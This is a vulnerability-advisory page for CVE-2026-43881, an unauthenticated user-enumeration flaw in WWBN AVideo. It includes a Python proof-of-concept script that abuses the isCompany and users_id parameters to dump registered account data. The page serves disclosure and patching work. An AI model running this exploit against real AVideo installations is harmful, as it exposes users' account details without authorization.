Security Vulnerability Report
CVE-2026-43881 CVSS 5.3 MEDIUM

CVE-2026-43881

Published: 2026-05-11 22:22:13
Last Modified: 2026-05-11 22:22:13

Description

WWBN AVideo is an open source video platform. In versions up to and including 29.0, objects/users.json.php exposes two unauthenticated paths that disclose the full set of registered user accounts. The isCompany request parameter causes the handler to set $ignoreAdmin = true for any non-admin caller (including unauthenticated visitors), which defeats the admin-only guard inside User::getAllUsers()/User::getTotalUsers(). A second path accepts users_id and calls User::getUserFromID() directly with no permission check, producing a single-user oracle. Both paths return id, identification (display name), channel URL, photo, background, and status, plus the total account count. Commit d9cdc702481a626b15f814f6093f1e2a9c20d375 contains an updated fix.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WWBN AVideo <= 29.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

def exploit_avideo_info_disclosure(target_url):
    """
    PoC for CVE-2026-43881: Information Disclosure in WWBN AVideo.
    This script demonstrates how to retrieve all users and specific user data
    without authentication.
    """
    vulnerable_endpoint = f"{target_url}/objects/users.json.php"
    print(f"[*] Targeting: {target_url}")

    # Path 1: Retrieve all registered users using the isCompany parameter
    # This bypasses the admin check in User::getAllUsers()
    params_all_users = {
        'isCompany': '1'  # Sets $ignoreAdmin = true in the backend
    }
    try:
        print("\n[+] Attempting to dump all users...")
        response = requests.get(vulnerable_endpoint, params=params_all_users, timeout=10)
        if response.status_code == 200:
            print(f"[!] Success! Response Data:\n{response.json()}")
        else:
            print(f"[-] Failed. Status Code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error during request: {e}")

    # Path 2: Retrieve a specific user (e.g., ID 1) using users_id parameter
    # This calls User::getUserFromID() without permission checks
    target_user_id = '1'
    params_single_user = {
        'users_id': target_user_id
    }
    try:
        print(f"\n[+] Attempting to dump user ID {target_user_id}...")
        response = requests.get(vulnerable_endpoint, params=params_single_user, timeout=10)
        if response.status_code == 200:
            print(f"[!] Success! User Data:\n{response.json()}")
        else:
            print(f"[-] Failed. Status Code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error during request: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost/avideo"
    exploit_avideo_info_disclosure(target)

References

https://github.com/WWBN/AVideo/commit/d9cdc702481a626b15f814f6093f1e2a9c20d375
https://github.com/WWBN/AVideo/security/advisories/GHSA-6rvw-7p8v-mjfq

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43881", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:12.667", "lastModified": "2026-05-11T22:22:12.667", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, objects/users.json.php exposes two unauthenticated paths that disclose the full set of registered user accounts. The isCompany request parameter causes the handler to set $ignoreAdmin = true for any non-admin caller (including unauthenticated visitors), which defeats the admin-only guard inside User::getAllUsers()/User::getTotalUsers(). A second path accepts users_id and calls User::getUserFromID() directly with no permission check, producing a single-user oracle. Both paths return id, identification (display name), channel URL, photo, background, and status, plus the total account count. Commit d9cdc702481a626b15f814f6093f1e2a9c20d375 contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/d9cdc702481a626b15f814f6093f1e2a9c20d375", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-6rvw-7p8v-mjfq", "source": "[email protected]"}]}}